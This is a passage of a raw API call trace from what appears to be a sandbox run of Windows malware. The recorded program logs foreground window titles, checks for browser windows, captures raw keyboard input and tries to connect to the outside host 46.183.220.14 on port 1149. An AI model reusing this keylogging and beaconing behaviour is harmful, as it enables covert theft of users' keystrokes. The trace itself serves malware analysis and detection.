lpWideCharStr="user32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0221.118] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f614 | out: ppsaOut=0x30f614) returned 0x0 [0221.118] GetUserDefaultLCID () returned 0x409 [0221.118] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f604, cchData=6 | out: lpLCData="1252") returned 5 [0221.118] SysStringLen (param_1="GetClassNameW") returned 0xe [0221.118] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetClassNameW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0221.118] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f614 | out: ppsaOut=0x30f614) returned 0x0 [0221.118] SetErrorMode (uMode=0x8001) returned 0x8001 [0221.118] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0221.119] SetErrorMode (uMode=0x8001) returned 0x8001 [0221.119] GetProcAddress (hModule=0x77820000, lpProcName="GetClassNameW") returned 0x778382a9 [0221.119] SafeArrayDestroyDescriptor (psa=0x6d7238) returned 0x0 [0221.119] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0221.119] GetClassNameW (in: hWnd=0x1018e, lpClassName=0x6d8adc, nMaxCount=256 | out: lpClassName="argentinasovietavgwindow") returned 24 [0221.119] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0221.119] VarBstrCmp (bstrLeft="argentinasovietavgwindow", bstrRight="MozillaUIWindowClass", lcid=0x0, dwFlags=0x30001) returned 0x2 [0221.119] VarBstrCmp (bstrLeft="argentinasovietavgwindow", bstrRight="MozillaWindowClass", lcid=0x0, dwFlags=0x30001) returned 0x2 [0221.119] VarBstrCmp (bstrLeft="argentinasovietavgwindow", bstrRight="IEFrame", lcid=0x0, dwFlags=0x30001) returned 0x2 [0221.119] VarBstrCmp (bstrLeft="argentinasovietavgwindow", bstrRight="OpWindow", lcid=0x0, dwFlags=0x30001) returned 0x2 [0221.119] VarBstrCmp (bstrLeft="argentinasovietavgwindow", bstrRight="OperaWindowClass", lcid=0x0, dwFlags=0x30001) returned 0x2 [0221.119] VarBstrCmp (bstrLeft="argentinasovietavgwindow", bstrRight="Chrome_WidgetWin_1", lcid=0x0, dwFlags=0x30001) returned 0x2 [0221.119] VarBstrCmp (bstrLeft="argentinasovietavgwindow", bstrRight="CabinetWClass", lcid=0x0, dwFlags=0x30001) returned 0x2 [0221.119] SendMessageA (hWnd=0x1018e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x14 [0221.120] GetLastError () returned 0x0 [0221.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30f834, cbMultiByte=1, lpWideCharStr=0x6e0f44, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0221.120] SysStringLen (param_1="") returned 0x14 [0221.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0221.120] SendMessageA (hWnd=0x1018e, Msg=0xd, wParam=0x15, lParam=0x6e0f44) returned 0x14 [0221.120] GetLastError () returned 0x0 [0221.120] SysStringByteLen (bstr="牁敧瑮湩⁡潓楶瑥䄠杶") returned 0x14 [0221.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6e0f44, cbMultiByte=20, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0221.121] SendMessageA (hWnd=0x50276, Msg=0xc, wParam=0x0, lParam=0x0) returned 0x1 [0221.121] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc, wParam=0x0, lParam=0x0) returned 0x1 [0221.121] GetLastError () returned 0x578 [0221.121] GetLastError () returned 0x578 [0221.121] GetLocalTime (in: lpSystemTime=0x30f6fc | out: lpSystemTime=0x30f6fc*(wYear=0x7e2, wMonth=0xb, wDayOfWeek=0x1, wDay=0x5, wHour=0x9, wMinute=0x1e, wSecond=0x1e, wMilliseconds=0x1f2)) [0221.121] VarDateFromUdate (in: pudateIn=0x30f720, dwFlags=0x0, pdateOut=0x30f6fc | out: pdateOut=0x30f6fc) returned 0x0 [0221.121] VarFormat (in: pvarIn=0x30f780, pstrFormat="mm/dd/yy", iFirstDay=1, iFirstWeek=1, dwFlags=0x0, pbstrOut=0x30f744 | out: pbstrOut=0x30f744*="11/05/18") returned 0x0 [0221.121] GetLocalTime (in: lpSystemTime=0x30f6fc | out: lpSystemTime=0x30f6fc*(wYear=0x7e2, wMonth=0xb, wDayOfWeek=0x1, wDay=0x5, wHour=0x9, wMinute=0x1e, wSecond=0x1e, wMilliseconds=0x1f2)) [0221.121] VarDateFromUdate (in: pudateIn=0x30f720, dwFlags=0x0, pdateOut=0x30f6fc | out: pdateOut=0x30f6fc) returned 0x0 [0221.121] VarFormat (in: pvarIn=0x30f780, pstrFormat="hh:mm:ss", iFirstDay=1, iFirstWeek=1, dwFlags=0x0, pbstrOut=0x30f740 | out: pbstrOut=0x30f740*="09:30:30") returned 0x0 [0221.121] VarBstrCmp (bstrLeft="11/05/18", bstrRight="11/05/18", lcid=0x0, dwFlags=0x30001) returned 0x1 [0221.122] GetUserDefaultLCID () returned 0x409 [0221.122] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6d0, cchData=6 | out: lpLCData="1252") returned 5 [0221.122] SysStringLen (param_1="GetForegroundWindow") returned 0x13 [0221.122] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetForegroundWindow", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0221.122] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6e0 | out: ppsaOut=0x30f6e0) returned 0x0 [0221.122] GetUserDefaultLCID () returned 0x409 [0221.122] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6d0, cchData=6 | out: lpLCData="1252") returned 5 [0221.122] SysStringLen (param_1="\r\n[Argentina Soviet Avg]\r\n") returned 0x1a [0221.122] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\r\n[Argentina Soviet Avg]\r\n", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0221.122] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6e0 | out: ppsaOut=0x30f6e0) returned 0x0 [0221.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x409ed0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0221.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x409ed0, cbMultiByte=-1, lpWideCharStr=0x6e0f1c, cchWideChar=7 | out: lpWideCharStr="Source") returned 7 [0221.122] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x30f6c8) [0221.123] RtlUnwind (TargetFrame=0x30f7ec, TargetIp=0x72a43bb5, ExceptionRecord=0x0, ReturnValue=0x0) [0221.123] GetUserDefaultLCID () returned 0x409 [0221.123] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6d0, cchData=6 | out: lpLCData="1252") returned 5 [0221.123] SysStringByteLen (bstr="\xb2ef\x4ef\xf4a4\xa9ee\x7a58\x69dc\x21b6\x368a\xef9a\x5433\x9789\x7265\xe8e4") returned 0x1a [0221.123] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x6e0bfc, cbMultiByte=26, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0221.123] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0221.123] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0221.123] ITextStream:Write (This=0x3d458, Text="\xef\xb2\xef\x04\xa4\xf4\xee\xa9\x58\x7a\xdc\x69\xb6\x21\x160\x36\x161\xef\x33\x54\x2030\x2014\x65\x72\xe4\xe8\x0d\x0a") returned 0x0 [0221.123] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f9b8 | out: ppsaOut=0x30f9b8) returned 0x0 [0221.124] GetUserDefaultLCID () returned 0x409 [0221.124] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6dc, cchData=6 | out: lpLCData="1252") returned 5 [0221.124] SysStringLen (param_1="user32.dll") returned 0xb [0221.124] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="user32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0221.124] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6ec | out: ppsaOut=0x30f6ec) returned 0x0 [0221.124] GetUserDefaultLCID () returned 0x409 [0221.124] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6dc, cchData=6 | out: lpLCData="1252") returned 5 [0221.124] SysStringLen (param_1="SetTimer") returned 0x9 [0221.124] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTimer", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0221.124] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6ec | out: ppsaOut=0x30f6ec) returned 0x0 [0221.125] SetErrorMode (uMode=0x8001) returned 0x8001 [0221.125] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0221.125] SetErrorMode (uMode=0x8001) returned 0x8001 [0221.125] GetProcAddress (hModule=0x77820000, lpProcName="SetTimer") returned 0x778379fb [0221.125] SafeArrayDestroyDescriptor (psa=0x6d7238) returned 0x0 [0221.125] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0221.125] SetTimer (hWnd=0x50276, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x404434) returned 0x1 [0221.125] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0221.125] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x4, lParam=0x1018e) returned 0x0 [0221.125] GetLastError () returned 0x0 [0221.125] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0221.125] GetTickCount () returned 0x3c64a [0221.125] GetTickCount () returned 0x3c64a [0221.126] GetTickCount () returned 0x3c64a [0221.126] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0221.126] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0221.126] WaitMessage () returned 1 [0221.350] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0221.350] TranslateMessage (lpMsg=0x30fb80) returned 0 [0221.351] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0221.351] GetCurrentProcessId () returned 0x35c [0221.351] PeekMessageA (in: lpMsg=0x30f8c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30f8c8) returned 0 [0221.351] GetTickCount () returned 0x3c734 [0221.351] GetTickCount () returned 0x3c734 [0221.351] GetTickCount () returned 0x3c734 [0221.351] GetTickCount () returned 0x3c734 [0221.351] IsWindowVisible (hWnd=0x20286) returned 0 [0221.351] Sleep (dwMilliseconds=0x0) [0221.365] Sleep (dwMilliseconds=0x1) [0221.381] GetLastError () returned 0x0 [0221.381] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0221.381] IMalloc:Alloc (This=0x75e366bc, cb=0x4b) returned 0x6d2df8 [0221.381] DispCallFunc (pvInstance=0x6cfda0, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x1, prgvt=0x6d2e40, prgpvarg=0x6d2e38, pvargResult=0x30f810) returned 0x0 [0221.382] GetUserDefaultLCID () returned 0x409 [0221.382] VarI4FromStr (in: strIn="1149", lcid=0x409, dwFlags=0x0, plOut=0x30edd0 | out: plOut=0x30edd0) returned 0x0 [0221.382] htons (hostshort=0x47d) returned 0x7d04 [0221.382] GetLastError () returned 0x0 [0221.382] SysStringLen (param_1="46.183.220.14") returned 0xd [0221.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="46.183.220.14", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0221.382] inet_addr (cp="46.183.220.14") returned 0xedcb72e [0221.382] GetLastError () returned 0x0 [0221.383] SysStringByteLen (bstr="㘴ㄮ㌸㈮〲ㄮ4") returned 0xd [0221.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6e0f1c, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0221.383] ITypeInfo:LocalInvoke (This=0x6e4d94) returned 0x0 [0221.383] socket (af=2, type=1, protocol=6) returned 0x188 [0221.383] GetLastError () returned 0x0 [0221.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=8, lpMultiByteStr=0x30ed14, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 8 [0221.383] connect (s=0x188, name=0x30ed0c*(sa_family=2, sin_port=0x47d, sin_addr="46.183.220.14"), namelen=16) returned -1 [0222.636] GetLastError () returned 0x274d [0222.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30ed14, cbMultiByte=8, lpWideCharStr=0x30ed2c, cchWideChar=8 | out: lpWideCharStr="") returned 8 [0222.637] closesocket (s=0x188) returned 0 [0222.637] GetLastError () returned 0x0 [0222.637] IMalloc:Free (This=0x75e366bc, pv=0x6d2df8) [0222.637] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0222.637] TranslateMessage (lpMsg=0x30fb80) returned 0 [0222.637] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0222.637] GetCurrentProcessId () returned 0x35c [0222.637] PeekMessageA (in: lpMsg=0x30f8c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30f8c8) returned 1 [0222.637] IsWindow (hWnd=0x50276) returned 1 [0222.637] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0222.637] GetParent (hWnd=0x50276) returned 0x0 [0222.637] TranslateMessage (lpMsg=0x30f8c8) returned 0 [0222.637] DispatchMessageA (lpMsg=0x30f8c8) returned 0x0 [0222.637] SendMessageA (hWnd=0x1018e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x14 [0222.638] GetLastError () returned 0x0 [0222.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30f5e8, cbMultiByte=1, lpWideCharStr=0x6e0f1c, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0222.638] SysStringLen (param_1="") returned 0x14 [0222.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0222.638] SendMessageA (hWnd=0x1018e, Msg=0xd, wParam=0x15, lParam=0x6e0f1c) returned 0x14 [0222.638] GetLastError () returned 0x0 [0222.638] SysStringByteLen (bstr="牁敧瑮湩⁡潓楶瑥䄠杶") returned 0x14 [0222.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6e0f1c, cbMultiByte=20, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0222.639] VarBstrCmp (bstrLeft="Argentina Soviet Avg", bstrRight="Argentina Soviet Avg", lcid=0x0, dwFlags=0x30001) returned 0x1 [0222.639] PeekMessageA (in: lpMsg=0x30f844, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30f844) returned 0 [0222.639] GetTickCount () returned 0x3cc33 [0222.639] IsWindowVisible (hWnd=0x20286) returned 0 [0222.639] Sleep (dwMilliseconds=0x0) [0222.641] Sleep (dwMilliseconds=0x1) [0222.644] GetLastError () returned 0x0 [0222.644] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0222.644] IMalloc:Alloc (This=0x75e366bc, cb=0x4b) returned 0x6e53d0 [0222.644] DispCallFunc (pvInstance=0x6cfda8, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x1, prgvt=0x6e5418, prgpvarg=0x6e5410, pvargResult=0x30f810) returned 0x0 [0222.644] GetLastInputInfo (in: plii=0x30ee94 | out: plii=0x30ee94) returned 1 [0222.644] GetLastError () returned 0x0 [0222.644] GetTickCount () returned 0x3cc43 [0222.644] GetLastError () returned 0x0 [0222.645] GetUserDefaultLCID () returned 0x409 [0222.645] VarBstrFromI4 (in: lIn=5, lcid=0x409, dwFlags=0x0, pbstrOut=0x30ee74 | out: pbstrOut=0x30ee74*="5") returned 0x0 [0222.645] GetUserDefaultLCID () returned 0x409 [0222.645] VarBstrFromI4 (in: lIn=300, lcid=0x409, dwFlags=0x0, pbstrOut=0x30ee70 | out: pbstrOut=0x30ee70*="300") returned 0x0 [0222.645] GetUserDefaultLCID () returned 0x409 [0222.645] VarBstrFromI4 (in: lIn=2, lcid=0x409, dwFlags=0x0, pbstrOut=0x30ee70 | out: pbstrOut=0x30ee70*="2") returned 0x0 [0222.646] IMalloc:Free (This=0x75e366bc, pv=0x6e53d0) [0222.646] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0222.646] GetTickCount () returned 0x3cc43 [0222.646] GetTickCount () returned 0x3cc43 [0222.646] GetTickCount () returned 0x3cc43 [0222.646] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0222.646] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0222.646] WaitMessage () returned 1 [0223.143] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0223.143] IsWindow (hWnd=0x50276) returned 1 [0223.143] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0223.144] GetParent (hWnd=0x50276) returned 0x0 [0223.144] TranslateMessage (lpMsg=0x30fb80) returned 0 [0223.144] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0223.144] SendMessageA (hWnd=0x1018e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x14 [0223.144] GetLastError () returned 0x0 [0223.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30f8a0, cbMultiByte=1, lpWideCharStr=0x6d2614, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0223.144] SysStringLen (param_1="") returned 0x14 [0223.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0223.144] SendMessageA (hWnd=0x1018e, Msg=0xd, wParam=0x15, lParam=0x6d2614) returned 0x14 [0223.145] GetLastError () returned 0x0 [0223.145] SysStringByteLen (bstr="牁敧瑮湩⁡潓楶瑥䄠杶") returned 0x14 [0223.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d2614, cbMultiByte=20, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0223.145] VarBstrCmp (bstrLeft="Argentina Soviet Avg", bstrRight="Argentina Soviet Avg", lcid=0x0, dwFlags=0x30001) returned 0x1 [0223.145] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0223.145] GetTickCount () returned 0x3ce36 [0223.145] GetTickCount () returned 0x3ce36 [0223.145] GetTickCount () returned 0x3ce36 [0223.145] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0223.145] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0223.145] WaitMessage () returned 1 [0224.066] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.066] IsWindow (hWnd=0x50276) returned 1 [0224.066] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.066] GetParent (hWnd=0x50276) returned 0x0 [0224.066] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.066] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.066] GetRawInputData (in: hRawInput=0x9010f, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0224.066] GetLastError () returned 0x0 [0224.066] PostMessageA (hWnd=0x50276, Msg=0x290, wParam=0x12, lParam=0x0) returned 1 [0224.066] GetLastError () returned 0x0 [0224.066] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x9010f) returned 0x0 [0224.066] GetLastError () returned 0x0 [0224.066] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.066] IsWindow (hWnd=0x50276) returned 1 [0224.066] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.066] GetParent (hWnd=0x50276) returned 0x0 [0224.066] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.066] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.066] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x290, wParam=0x12, lParam=0x0) returned 0x0 [0224.066] GetLastError () returned 0x0 [0224.067] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.067] IsWindow (hWnd=0x50276) returned 1 [0224.067] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.067] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.067] GetParent (hWnd=0x50276) returned 0x0 [0224.067] TranslateMessage (lpMsg=0x30fb80) returned 1 [0224.067] DispatchMessageA (lpMsg=0x30fb80) returned 0x1 [0224.067] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x100, wParam=0x12, lParam=0x0) returned 0x1 [0224.067] GetLastError () returned 0x0 [0224.067] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0224.067] GetTickCount () returned 0x3d1cf [0224.067] GetTickCount () returned 0x3d1cf [0224.067] GetTickCount () returned 0x3d1cf [0224.067] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0224.067] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0224.067] WaitMessage () returned 1 [0224.074] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.074] IsWindow (hWnd=0x50276) returned 1 [0224.074] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.074] GetParent (hWnd=0x50276) returned 0x0 [0224.074] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.074] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.075] GetRawInputData (in: hRawInput=0xa010f, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0224.075] GetLastError () returned 0x0 [0224.075] PostMessageA (hWnd=0x50276, Msg=0x290, wParam=0x1b, lParam=0x0) returned 1 [0224.075] GetLastError () returned 0x0 [0224.075] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0xa010f) returned 0x0 [0224.075] GetLastError () returned 0x0 [0224.075] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.075] IsWindow (hWnd=0x50276) returned 1 [0224.075] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.075] GetParent (hWnd=0x50276) returned 0x0 [0224.075] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.075] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.075] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x290, wParam=0x1b, lParam=0x0) returned 0x0 [0224.075] GetLastError () returned 0x0 [0224.075] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.075] IsWindow (hWnd=0x50276) returned 1 [0224.075] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.075] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.075] GetParent (hWnd=0x50276) returned 0x0 [0224.075] TranslateMessage (lpMsg=0x30fb80) returned 1 [0224.076] DispatchMessageA (lpMsg=0x30fb80) returned 0x1 [0224.076] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x100, wParam=0x1b, lParam=0x0) returned 0x1 [0224.076] GetLastError () returned 0x0 [0224.076] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.076] IsWindow (hWnd=0x50276) returned 1 [0224.076] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.076] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.076] GetParent (hWnd=0x50276) returned 0x0 [0224.076] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.076] DispatchMessageA (lpMsg=0x30fb80) returned 0x1 [0224.076] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x102, wParam=0x1b, lParam=0x0) returned 0x1 [0224.076] GetLastError () returned 0x0 